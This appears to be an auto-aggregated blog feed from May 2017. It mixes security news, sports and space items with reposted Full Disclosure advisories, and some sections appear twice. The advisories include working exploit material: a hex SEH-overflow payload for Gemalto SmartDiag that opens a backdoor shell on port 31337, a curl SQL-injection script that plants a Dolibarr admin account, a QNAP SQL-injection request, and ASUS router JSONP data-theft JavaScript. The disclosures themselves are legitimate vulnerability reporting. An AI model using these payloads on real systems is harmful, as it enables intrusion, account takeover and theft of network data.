Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
[FD] SEC Consult SA-20170511-0 :: Stack-based buffer overflow vulnerability in Guidance Software EnCase Forensic Imager
A blog post with additional information is available here: http://ift.tt/2q5pyQO We have also released a video showing arbitrary code execution: https://www.youtube.com/watch?v=1EngNIXSNQw SEC Consult Vulnerability Lab Security Advisory < 20170511-0 > ======================================================================= title: Stack based buffer overflow product: Guidance Software EnCase Forensic Imager vulnerable version: EnCase Forensic Imager <= 7.10 fixed version: - CVE number: - impact: critical homepage: http://ift.tt/1WhUYON found: 2017-02-17 by: W. Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich http://ift.tt/1mGHMNR ======================================================================= Vendor description:
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
Dutch Police Seize Another Company that Sells PGP-Encrypted Blackberry Phones
The Dutch police arrested four suspects on Tuesday on suspicion of money laundering and involvement in selling custom encrypted BlackBerry and Android smartphones to criminals. The Dutch National High Tech Crime Unit (NHTCU), dedicated team within the Dutch National Police Agency aims to investigate advanced forms of cyber crimes, carried out investigation and found that the phone brand "
from The Hacker News http://ift.tt/2q5fLKy
via IFTTT
from The Hacker News http://ift.tt/2q5fLKy
via IFTTT
JuliaLang/julia
Anonymous functions that return anonymous functions error on deserialization. #21793. Open. amitmurthy opened this Issue 7 minutes ago · 0 ...
from Google Alert - anonymous http://ift.tt/2pzNmbH
via IFTTT
from Google Alert - anonymous http://ift.tt/2pzNmbH
via IFTTT
The Multiwavelength Crab
The Crab Nebula is cataloged as M1, the first object on Charles Messier's famous list of things which are not comets. In fact, the Crab is now known to be a supernova remnant, expanding debris from massive star's death explosion, witnessed on planet Earth in 1054 AD. This brave new image offers a 21st century view of the Crab Nebula by presenting image data from across the electromagnetic spectrum as wavelengths of visible light. From space, Chandra (X-ray) XMM-Newton (ultraviolet), Hubble (visible), and Spitzer (infrared), data are in purple, blue, green, and yellow hues. From the ground, Very Large Array radio wavelength data is in shown in red. One of the most exotic objects known to modern astronomers, the Crab Pulsar, a neutron star spinning 30 times a second, is the bright spot near picture center. Like a cosmic dynamo, this collapsed remnant of the stellar core powers the Crab's emission across the electromagnetic spectrum. Spanning about 12 light-years, the Crab Nebula is 6,500 light-years away in the constellation Taurus. via NASA http://ift.tt/2r0edjf
Wednesday, May 10, 2017
Anonymous Looking for an Executive Chef
We are a locally-based restaurant group (five locations) looking for a talented and passionate executive chef to helm a busy neighborhood restaurant ...
from Google Alert - anonymous http://ift.tt/2q4usO0
via IFTTT
from Google Alert - anonymous http://ift.tt/2q4usO0
via IFTTT
[FD] Multiple Vulnerabilities in ASUS Routers [CVE-2017-5891 and CVE-2017-5892]
[Original post here: http://ift.tt/2r0Me2G] Summary Various models of ASUS RT routers have several CSRF vulnerabilities allowing malicious sites to login and change settings in the router; multiple JSONP vulnerabilities allowing exfiltration of router data and an XML endpoint revealing WiFi passwords. Most of these issues have been fixed by Asus in the March 2017 firmware update under v3.0.0.4.380.7378. One issue (JSONP information disclosure) remains unfixed since the vendor doesn't consider it to be a security threat. CVE-2017-5891 has been assigned to the CSRF issues, and CVE-2017-5892 to cover the non-CSRF issues. Vulnerability Details RT routers from ASUS like many other routers come with a built-in web interface accessible over the local network but normally not accessible via the Internet. We discovered multiple issues within that web interface that would can facilitate attacks on the router either via a malicious site visited by a user on the same network, or a malicious mobile or desktop application running on the same network. For the CSRF vulnerabilities, a user would need to visit a malicious site which can try to login and change settings. For the JSONP vulnerabilities, a website can load the JSONP endpoints via SCRIPT tags as long as matching function name is defined on that site. The XML endpoint requires a mobile or desktop application to exploit. NOTE: all of these assume that the attacker knows the local IP address of the router. This could probably be guessed or be determined via Javascript APIs like WebRTC. For desktop and mobile applications, determination of the gateway address should be trivial to implement. Issue #1 - Login Page CSRF The login page for the router doesn't have any kind of CSRF protection, thus allowing a malicious website to submit a login request to the router without the user's knowledge. Obviously, this only works if the site either knows the username and password of the router OR the user hasn't changed the default credentials ("admin / admin"). To exploit, submit the base-64 encoded username and password as "login_authorization" form post, to the "/login.cgi" URL of the browser. Example of a form that can exploit this issue (uses default credentials):
Issue #2 - Save Settings CSRF The various pages within the interface that can save settings do not have CSRF protection. That means that a malicious site, once logged in as described above would be able to change any settings in the router without the user's knowledge. NOTE: We have not been to exploit this issue consistently Issue #3 - JSONP Information Disclosure Without Login Two JSONP endpoints exist within the router which allow detection of which ASUS router is running and some information disclosure. No login is required to the router. The vendor doesn't consider these endpoints a security threat. The endpoints are as follows: /findasus.json Returns the router model name, SSID name and the local IP address of the router iAmAlive([{model?Name: "XXX", ssid: "YYY", ipAddr: "ZZZZ"}]) /httpd_check.json Returns: {"alive": 1, "isdomain": 0} Exploit code as follows: function iAmAlive(payload) { window.alert("Result returned: " + JSON.stringify(payload)); } function alert1() { var script = document.createElement('script'); script.src = 'http://ift.tt/2pv9NyO' document.getElementsByTagName('head')[0].appendChild(script); } function alert2() { var script = document.createElement('script'); script.src = 'http://ift.tt/2qRpQeU' document.getElementsByTagName('head')[0].appendChild(script); } Issue #4 - JSONP Information Disclosure, Login Required There exist multiple JSONP endpoints within the router interface that reveal various data from the router including. Below is a list of endpoints and exploit code: /status.asp - Network Information function getstatus() { var script = document.createElement('script'); script.src = 'http://ift.tt/1yF9uRq' document.getElementsByTagName('head')[0].appendChild(script); } function show_wanlink_info() { var obj = {}; obj.status = wanlink_status(); obj.statusstr = wanlink_statusstr(); obj.wanlink_type = wanlink_type(); obj.wanlink_ipaddr = wanlink_ipaddr(); obj.wanlink_xdns = wanlink_xdns(); window.alert(JSON.stringify(obj)); }
/wds_aplist_2g.asp - Surrounding Access points, 2.4 Ghz band /wds_aplist_5g.asp - Surrounding Access points, 5 Ghz band function getwds_2g() { var script = document.createElement('script'); script.src = 'http://ift.tt/2qRj0X9' document.getElementsByTagName('head')[0].appendChild(script); } function getwds_5g() { var script = document.createElement('script'); script.src = 'http://ift.tt/2pvnnSX' document.getElementsByTagName('head')[0].appendChild(script); }
/update_networkmapd.asp - Network map of devices on the network function getmap() { var script = document.createElement('script'); script.src = 'http://ift.tt/2qRifgx' document.getElementsByTagName('head')[0].appendChild(script); }
/update_clients.asp - Origin data function getorigin() { originData = []; var script = document.createElement('script'); script.src = 'http://ift.tt/2pvl1mM' document.getElementsByTagName('head')[0].appendChild(script); }
/get_real_ip.asp - External IP address function getrealip() { var script = document.createElement('script'); script.src = 'http://ift.tt/2qRdlA2' document.getElementsByTagName('head')[0].appendChild(script); }
/get_webdavInfo.asp - WebDAV information function getwebdav() { var script = document.createElement('script'); script.src = 'http://ift.tt/2pvjXzz'; document.getElementsByTagName('head')[0].appendChild(script); }
Issue #5 - XML Endpoint Reveals WiFi Passwords An XML endpoint exists in the router which reveals the WiFi password to the router but to fully exploit this issue, it would require a mobile or desktop application running on the local network since XML cannot be loaded cross origin in the browser. This endpoint can be accessed at the following URL and requires login: [router IP]/WPS_info.xml Mitigation Steps / Vendor Response Users should change the default credentials and apply the latest firmware released by ASUS, version v3.0.0.4.380.7378 or higher. There is no mitigation available for the issue #3 - JSONP information disclosure without login. Affected models include the following ASUS routers: RT-AC55U RT-AC56R RT-AC56S RT-AC56U RT-AC66U RT-AC88U RT-AC66R RT-AC66U RT-AC66W RT-AC68W RT-AC68P RT-AC68R RT-AC68U RT-AC87R RT-AC87U RT-AC51U RT-AC53U RT-AC1900P RT-AC3100 RT-AC3200 RT-AC5300 RT-N11P RT-N12 (D1 version only) RT-N12+ RT-N12E RT-N18U RT-N56U RT-N66R RT-N66U (B1 version only) RT-N66W References CVE-IDs: CVE-2017-5891 and CVE-2017-5892 CERT/CC Tracking # VR-627 Credits We would like to thank CERT/CC for helping to coordinate the disclosure process. This advisory was written by Yakov Shafranovich. Timeline 2017-01-21: Initial contact with the vendor 2017-01-23: Initial contact with CERT/CC 2017-02-05: Vulnerability details and POC code provided to the vendor, CVEs requested 2017-02-10: Vulnerability analysis received from the vendor 2017-02-12: Beta firmware provided by the firmware to test fixes 2017-02-12: Vendor fixes confirmed 2017-03-31: Fixed firmware released publicly by the vendor 2017-05-01: Draft advisory shared with the vendor and CERT/CC 2017-05-09: Public disclosure
Source: Gmail -> IFTTT-> Blogger
/wds_aplist_2g.asp - Surrounding Access points, 2.4 Ghz band /wds_aplist_5g.asp - Surrounding Access points, 5 Ghz band function getwds_2g() { var script = document.createElement('script'); script.src = 'http://ift.tt/2qRj0X9' document.getElementsByTagName('head')[0].appendChild(script); } function getwds_5g() { var script = document.createElement('script'); script.src = 'http://ift.tt/2pvnnSX' document.getElementsByTagName('head')[0].appendChild(script); }
/update_networkmapd.asp - Network map of devices on the network function getmap() { var script = document.createElement('script'); script.src = 'http://ift.tt/2qRifgx' document.getElementsByTagName('head')[0].appendChild(script); }
/update_clients.asp - Origin data function getorigin() { originData = []; var script = document.createElement('script'); script.src = 'http://ift.tt/2pvl1mM' document.getElementsByTagName('head')[0].appendChild(script); }
/get_real_ip.asp - External IP address function getrealip() { var script = document.createElement('script'); script.src = 'http://ift.tt/2qRdlA2' document.getElementsByTagName('head')[0].appendChild(script); }
/get_webdavInfo.asp - WebDAV information function getwebdav() { var script = document.createElement('script'); script.src = 'http://ift.tt/2pvjXzz'; document.getElementsByTagName('head')[0].appendChild(script); }
Issue #5 - XML Endpoint Reveals WiFi Passwords An XML endpoint exists in the router which reveals the WiFi password to the router but to fully exploit this issue, it would require a mobile or desktop application running on the local network since XML cannot be loaded cross origin in the browser. This endpoint can be accessed at the following URL and requires login: [router IP]/WPS_info.xml Mitigation Steps / Vendor Response Users should change the default credentials and apply the latest firmware released by ASUS, version v3.0.0.4.380.7378 or higher. There is no mitigation available for the issue #3 - JSONP information disclosure without login. Affected models include the following ASUS routers: RT-AC55U RT-AC56R RT-AC56S RT-AC56U RT-AC66U RT-AC88U RT-AC66R RT-AC66U RT-AC66W RT-AC68W RT-AC68P RT-AC68R RT-AC68U RT-AC87R RT-AC87U RT-AC51U RT-AC53U RT-AC1900P RT-AC3100 RT-AC3200 RT-AC5300 RT-N11P RT-N12 (D1 version only) RT-N12+ RT-N12E RT-N18U RT-N56U RT-N66R RT-N66U (B1 version only) RT-N66W References CVE-IDs: CVE-2017-5891 and CVE-2017-5892 CERT/CC Tracking # VR-627 Credits We would like to thank CERT/CC for helping to coordinate the disclosure process. This advisory was written by Yakov Shafranovich. Timeline 2017-01-21: Initial contact with the vendor 2017-01-23: Initial contact with CERT/CC 2017-02-05: Vulnerability details and POC code provided to the vendor, CVEs requested 2017-02-10: Vulnerability analysis received from the vendor 2017-02-12: Beta firmware provided by the firmware to test fixes 2017-02-12: Vendor fixes confirmed 2017-03-31: Fixed firmware released publicly by the vendor 2017-05-01: Draft advisory shared with the vendor and CERT/CC 2017-05-09: Public disclosure
Source: Gmail -> IFTTT-> Blogger
[FD] Gemalto SmartDiag Diagnosis Tool <= v2.5 - Buffer Overflow - SEH Overwrite - Code Execution
# Exploit Title: Gemalto SmartDiag Diagnosis Tool <= v2.5 - Buffer Overflow - SEH Overwrite - Code Execution # Date: 16-03-2017 # Software Link: http://ift.tt/2qKVVVU # Exploit Author: Majid Alqabandi # Contact: http://ift.tt/2qLfFsp # CVE: CVE-2017-6953 # Category: Local - command execution - Buffer Overflow - SEH Overwrite. # Vendor Notified: 17-04-2016 1. Description SymDiag.exe is vulnerable to buffer overflow, SEH overwrite. When trying to (Register a new card), Input fields are vulnerable to stack overflow attack which leads to code execution and other possible security threats. 2. Proof of Concept The following PoC is provided code will: - Exploit the vulnerability. - Execute shell code. - Create a backdoor on port 31337. To exploit, start SmartDiag.exe tool, choose "Register a new card", on the ATR use the following payload (Tested on Win7x64 & Win8x64 - SmartDiag v2.5): 52834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340 0052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528 3400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000 5283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000572b0410477f40008c214100f494400041ed40003b4140003552011078ab0110010000009cf2021000100000328b031040000000d02203100120400026e6400090909090e2f5001090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090ddc1d97424f4bbc4aa698a5833c9b15683e8fc3158140358d0489c7630055f87c076e962f1a48de7a378c5aa4ff28b5ec47604506d3c725f6ef0ba33ac92464ee0747681f575bffcf524688aa7d81dce7bd8f144c3a2749ab71876cb671630f30c70e102c162dd4d6e50954fa6a8567e8667694e0b79ad69f30cc5898e161 ef3549283531f046065ccd3e369b990ac6d3c74c78ab57b081b8d5f8c4756c1952d39fec68ae65a8c39f3ddcf5530d0efa55e638397c1df0b948af9ccdba1be432249bf4ae11defe4c01d64f5edc82ba541a28b152212647cad4d947f67f892b153a974b06337ec3d85adfe6b1d593d4896fe3eba8a57a9f2c46fd602c3dc7baa8496976fb4a9bdc7bf92569dd151c6a2fb016b3060d1e2293f86a39c36425e86e070a35eca3078a3d5b90d9ff1a9cb20be9d8376684b6221da253c9eb4a1b9ec06b7c538f15777954468b8714111a4e1aec86c11e550c4baa00154a752fc9bded0f46325c87d61614e6e1bfa3b9088fb69AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 3. Solution: Vendor has been informed and confirmed the issue, no fix is available yet from vendor.
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
[FD] QNAP PhotoStation 5.2.4 and MusicStation 4.8.4 Authentication Bypass
# Exploit QNAP PhotoStation 5.2.4 and MusicStation 4.8.4 Authentication Bypass # Date: 10.05.2017 # Software Link: https://www.qnap.com # Exploit Author: Kacper Szurek # Contact: https://twitter.com/KacperSzurek # Website: http://ift.tt/2iHZPtU # Category: web 1. Description `$_COOKIE[STATIONSID]` is not escaped and then used inside SQL statement. http://ift.tt/2qTCUR3 2. Proof of Concept GET /photo/api/dmc.php HTTP/1.1 Host: qnap.host:8080 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, sdch Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4 Cookie: QMS_SID=' UNION SELECT 9999999999,9999999999,9999999999,9999999999,9999999999,9999999999,9999999999,9999999999,9999999999 -- a Connection: close 3. Fix Upgrade to version: Photo Station (5.3.4 / 5.2.5), Music Station (5.0.4 / 4.8.5)
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
[FD] [FOXMOLE SA 2017-02-23] Dolibarr ERP & CRM - Multiple Issues
=== FOXMOLE - Security Advisory 2017-02-23 === Dolibarr ERP & CRM - Multiple Issues ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Affected Versions ================= Dolibarr 4.0.4 Issue Overview ============== Vulnerability Type: SQL Injection, Cross Site Scripting, Weak Hash Algorithm without Salt, Weak Password Change Method Technical Risk: critical Likelihood of Exploitation: medium Vendor: Dolibarr Vendor URL: http://ift.tt/1SLkKIl Credits: FOXMOLE employees Tim Herres and Stefan Pietsch Advisory URL: http://ift.tt/2qqXfxh Advisory Status: Public OVE-ID: OVE-20170223-0001 CVE Number: CVE-2017-7886, CVE-2017-7887, CVE-2017-7888 CVE URL: http://ift.tt/2r1u1SS http://ift.tt/2qqZzUY http://ift.tt/2r1u2pU CWE-ID: CWE-79, CWE-89, CWE-327, CWE-620, CWE-759 CVSS 2.0: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C) Impact ====== There are SQL injection vulnerabilities, exploitable without authentication. An attacker could use the SQL Injection to access the database in an unsafe way. This means there is a high impact to all Dolibarr installations. The passwords in the database are stored as MD5 hashes which means they are easily crackable. The Dolibarr software also lacks input validation resulting in different reflected XSS vulnerabilities. Information =========== We only provide examples for issues, there are quite more. It is really important to check the whole application for further vulnerabilities. We want that developers change the overall security according to security best practices instead of fixing only particular issues. Issue Description ================= All items tested using FF52. 1.) SQL Injection in style.css.php (CVE-2017-7886) Authentication Required:No PoC: http://ift.tt/2qrjWBL(extractvalue(rand()%2cconcat(concat(0x3a,CURRENT_USER())))%2c1)--%201 PoC creating a new admin user via SQL Injection: ################################################################################## #!/bin/bash URL="http://ift.tt/2r1jkj7\ llx_user%20VALUES%20(424242%2C%200%2C%20NULL%2C%20NULL%2C%201%2C%200%2C%20%27\ 1984-01-01%2000%3A00%3A00%27%2C%20%271984-01-01%2000%3A00%3A00.000%27%2C%20NULL\ %2C%20NULL%2C%20%27newadmin%27%2C%20NULL%2C%20%2761529519452809720693702583126814\ %27%2C%20NULL%2C%20NULL%2C%20%27%27%2C%20NULL%2C%20%27SuperAdmin%27%2C%20%27%27\ %2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20NULL%2C%20NULL%2C%20%27%27%2C%20%27\ %27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%201%2C%201%2C\ %201%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20%27%27%2C%20%27\ 2017-03-10%2000%3A00%3A00%27%2C%20%272017-03-10%2000%3A00%3A00%27%2C%20NULL%2C\ %20%27%27%2C%20NULL%2C%201%2C%20NULL%2C%20NULL%2C%20%27%27%2C%20NULL%2C%200%2C\ %20%27%27%2C%200%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL)%3B--%27" curl -s ${URL} ################################################################################## The script creates the user 'NEWADMIN' with password 'ximaz'. 2.) Cross Site Scripting Reflected (CVE-2017-7887) http://ift.tt/2q747Nm 3.) Passwords stored using MD5 hashes (CVE-2017-7888) The application stored the passwords using the MD5 hash algorithm without a salt. The MD5 hash is easily crackable. dolibarr=# SELECT login,pass_crypted FROM llx_user; login | pass_crypted
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
I have a new follower on Twitter
#TweetChat
Engage in #TwitterChat & #TwitterParty conversations. Follow #hashtags & events. #Curate your Twitter stream w/ #FavePages. Powered by https://t.co/dXdkYmXO0e
NYC
https://t.co/4DSs5RW5WO
Following: 14760 - Followers: 28998
May 10, 2017 at 05:45PM via Twitter http://twitter.com/TweetChat
Ravens: Little-used rule likely precludes pursuit of free-agent RB LeGarrette Blount (ESPN)
from ESPN http://ift.tt/17lH5T2
via IFTTT
via IFTTT
[FD] [CORE-2017-0001] - SAP SAPCAR Heap Based Buffer Overflow Vulnerability
1. *Advisory Information* Title: SAP SAPCAR Heap Based Buffer Overflow Vulnerability Advisory ID: CORE-2017-0001 Advisory URL: http://ift.tt/2r2CEfM heap-based-buffer-overflow-vulnerability Date published: 2017-05-10 Date of last update: 2017-05-10 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Heap-based Buffer Overflow [CWE-122] Impact: Code execution Remotely Exploitable: No Locally Exploitable: Yes CVE Name: CVE-2017-8852 3. *Vulnerability Description* SAP [1] distributes software and packages using an archive program called SAPCAR [2]. This program uses a custom archive file format. A memory corruption vulnerability was found in the parsing of specially crafted archive files, that could lead to local code execution scenarios. 4. *Vulnerable Packages* SAPCAR archive tool version 721.510 Other products and versions might be affected, but they were not tested. 5. *Vendor Information, Solutions and Workarounds* SAP published the following Security Notes: . 2441560 6. *Credits* This vulnerability was discovered and researched by Martin Gallo and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* This vulnerability is caused by a controlled heap buffer overflow when opening a specially crafted CAR archive file. The following python code can be used to generate an archive file that triggers the vulnerability: /--
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
An Alternative Anonymous Cryptocurrency Apple Coin Review
An Alternative Anonymous Cryptocurrency Apple Coin Review. AppeCoin, Sergio D. Lerner's proposal for an e-cash scheme, is designed for a ...
from Google Alert - anonymous http://ift.tt/2r0fXbh
via IFTTT
from Google Alert - anonymous http://ift.tt/2r0fXbh
via IFTTT
Google Won't Patch A Critical Android Flaw Before ‘Android O’ Release
Millions of Android smartphones are at serious risk of "screen hijack" vulnerability that allows hackers to steal your passwords, bank details, as well as helps ransomware apps extort money from victims. The worse thing is that Google says it won't be patched until the release of 'Android O' version, which is scheduled for release in the 3rd quarter this year. And the worse, worse, worse
from The Hacker News http://ift.tt/2r28lGe
via IFTTT
from The Hacker News http://ift.tt/2r28lGe
via IFTTT
Ravens: RB Taquan "Smoke" Mizzell among 25 players on Mel Kiper Jr.'s list of top undrafted rookies (ESPN)
from ESPN http://ift.tt/17lH5T2
via IFTTT
via IFTTT
ISS Daily Summary Report – 5/09/2017
OsteoOmics: The crew changed BioCell media in BioCell Habitat 2. The media in the other four habitats will be changed this week. This is the second of four weeks of OsteoOmics operations. Crewmembers experience bone loss in orbit, stemming from the lack of gravity acting on their bones. OsteoOmics investigates the molecular mechanisms that dictate this bone loss by examining osteoblasts, which form bone, and osteoclasts, which dissolve bone. Improved understanding of these mechanisms could lead to more effective countermeasures to prevent bone loss during space missions and in a wide range of disorders on Earth. This may lead to better preventative care or therapeutic treatments for people suffering bone loss as a result of bone diseases like osteopenia and osteoporosis, or for patients on prolonged bed rest. Veg-03: The crew harvested leaves from Chinese Cabbage growing in the Veggie facility and inserted samples into Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI). The remainder of the plants were left to grow. The goal of Veg-03 is to further demonstrate the proof of concept for the Veggie plant growth chamber and planting pillows. Future long-duration missions into the solar system will require a fresh food supply to supplement crew diets, which entails growing crops in space. Previous investigations focused on improving productivity in controlled environments but the limited quarters of the space shuttle and ISS made it difficult to conduct large-scale crop production tests. Veg-03 expands on previous validation tests of the Veggie hardware to grow cabbage, lettuce and other fresh vegetables. Tests determine which types of microorganisms are present in space-grown cabbage, providing baseline data for future crop-growing efforts. Behavioral health surveys assess the impact of growing plants on crew morale and mood. Extravehicular Activity (EVA) Preparations: The crew completed the following in preparation for the EXPRESS Pallet Controller Assembly (ExPCA) EVA currently planned for this Friday, May 12. Prepared the Equipment Lock, Extravehicular Mobility Units (EMUs) and ancillary hardware to support suit donning. Installed/replaced Metal Oxide (METOX) Lithium Hydroxide (LiOH) canisters and batteries in EMU 3006 and 3008. Performed EMU pressurized fit verification to ensure proper fit and feel prior to the EVA. Performed a procedures review covering reminders, emergency briefing and helpful tips. Following the review, the crew completed a conference with ground teams to address any questions or concerns. Orbital ATK (OA)-7 Cargo Operations: Yesterday afternoon, the crew continued transferring Cygnus cargo to ISS. Approximately 3 hours of transfer operations remain to be completed. Cygnus is currently scheduled to unberth from ISS on July 16th. Today’s Planned Activities All activities were completed unless otherwise noted. Personal Data Prep for Return Atmospheric Control System (ACS) NORS Oxygen Teardown Test Video Recording for Russia Today TV Channel Preparation of Reports for Roscosmos Web Site and Social Media URAGAN. Observation and photography EKON-M. Observations and photography Extravehicular Activity (EVA) Reminder for On-Orbit Fit check Verification (OFV) SARCOLAB-3 CONSTRAINTS Acoustic Dosimeter Setup Day 2 OsteoOmics Media Relocate VEG-03 Science Harvest OsteoOmics Media Change VEG-03 MELFI Insertion #1 On-Orbit Hearing Assessment (O-OHA) with EarQ Software Setup and Test Nanoracks Cubesat Deployer PAO Video Extravehicular Activity (EVA) Equipment Lock Preparation Part 1 Extravehicular Mobility Unit (EMU) Metal Oxide (METOX) Installation Extravehicular Mobility Unit (EMU) On-orbit Fit check Verification Приватная семейная конференция CASKAD. Manual Mixing in Bioreactor Extravehicular Activity (EVA) Procedure Review Extravehicular Activity (EVA) Procedure Conference Water Recovery System Waste Water Tank Drain Init On-Orbit Hearing Assessment (O-OHA) with EarQ Software Setup and Test Water Recovery System Waste Water Tank Drain Termination Early Mission Debrief Conference OsteoOmics MELFI Removal Completed Task List Items Veggie 03 Pillow Watering and Photo Ground Activities All activities were completed unless otherwise noted. EVA prep support SPDM Stow and MT Translation from WS3 to WS4 MSS ExPCA EVA Setup Three-Day Look Ahead: Wednesday, 05/10: EVA procedures review, MARES, OsteoOmics media change, OBT ISS emergency simulation Thursday, 05/11: EVA Equipment Lock prep part 2, EVA procedures conference, EVA tool audit, OsteoOmics, Friday, 05/12: ExPCA EVA #42 QUICK ISS Status – Environmental Control Group: Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Operate Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Process Trace Contaminant Control System (TCCS) Lab Full up Trace Contaminant Control System (TCCS) Node 3 Off
from ISS On-Orbit Status Report http://ift.tt/2r22KQ5
via IFTTT
from ISS On-Orbit Status Report http://ift.tt/2r22KQ5
via IFTTT
[FD] SEC Consult SA-20170510-0 :: Insecure Handling Of URI Schemes in Microsoft OneDrive iOS App
A short demo video is available here: https://youtu.be/0jZdM9peVSk SEC Consult Vulnerability Lab Security Advisory < 20170510-0 > ======================================================================= title: Insecure Handling Of URI Schemes product: Microsoft OneDrive iOS App vulnerable version: 8.13 fixed version: 8.14 impact: Medium homepage: http://ift.tt/L3en2E found: 2017-04-10 by: S. Tripathy (Office Singapore) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich http://ift.tt/1mGHMNR ======================================================================= Vendor description:
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
Cisco Finally Patches 0-Day Exploit Disclosed In Wikileaks-CIA Leak
Cisco Systems has finally released an update for its IOS and IOS XE software to address a critical vulnerability, disclosed nearly two months back in the CIA Vault 7 leak, that affects more than 300 of its switch models. The company identified the vulnerability in its product while analyzing "Vault 7" dump — thousands of documents and files leaked by Wikileaks, claiming to detail hacking
from The Hacker News http://ift.tt/2pwbnAw
via IFTTT
from The Hacker News http://ift.tt/2pwbnAw
via IFTTT
Microsoft Issues Patches for Another Four Zero-Day Vulnerabilities
As part of this month's Patch Tuesday, Microsoft has released security patches for a total of 55 vulnerabilities across its products, including fixes for four zero-day vulnerabilities being exploited in the wild. Just yesterday, Microsoft released an emergency out-of-band update separately to patch a remote execution bug (CVE-2017-0290) in Microsoft's Antivirus Engine that comes enabled by
from The Hacker News http://ift.tt/2q2KXu6
via IFTTT
from The Hacker News http://ift.tt/2q2KXu6
via IFTTT
[InsideNothing] TechBook liked your post "[FD] Zend Framework / zend-mail < 2.4.11 Remote Code Execution (CVE-2016-10034)"
|
Source: Gmail -> IFTTT-> Blogger
Trump Fires FBI Director Over Clinton Probe, Amid Russia Investigation
President Donald Trump has abruptly fired James Comey, the director of the Federal Bureau of Investigation (FBI) who was leading an investigation into alleged links between Trump and Russia. The White House announced on Tuesday that Comey was fired on the "clear recommendation" of Deputy Attorney General Rod Rosenstein and Attorney General Jeff Sessions, citing the reason that he was no longer
from The Hacker News http://ift.tt/2pv0nDv
via IFTTT
from The Hacker News http://ift.tt/2pv0nDv
via IFTTT
Subscribe to:
Posts (Atom)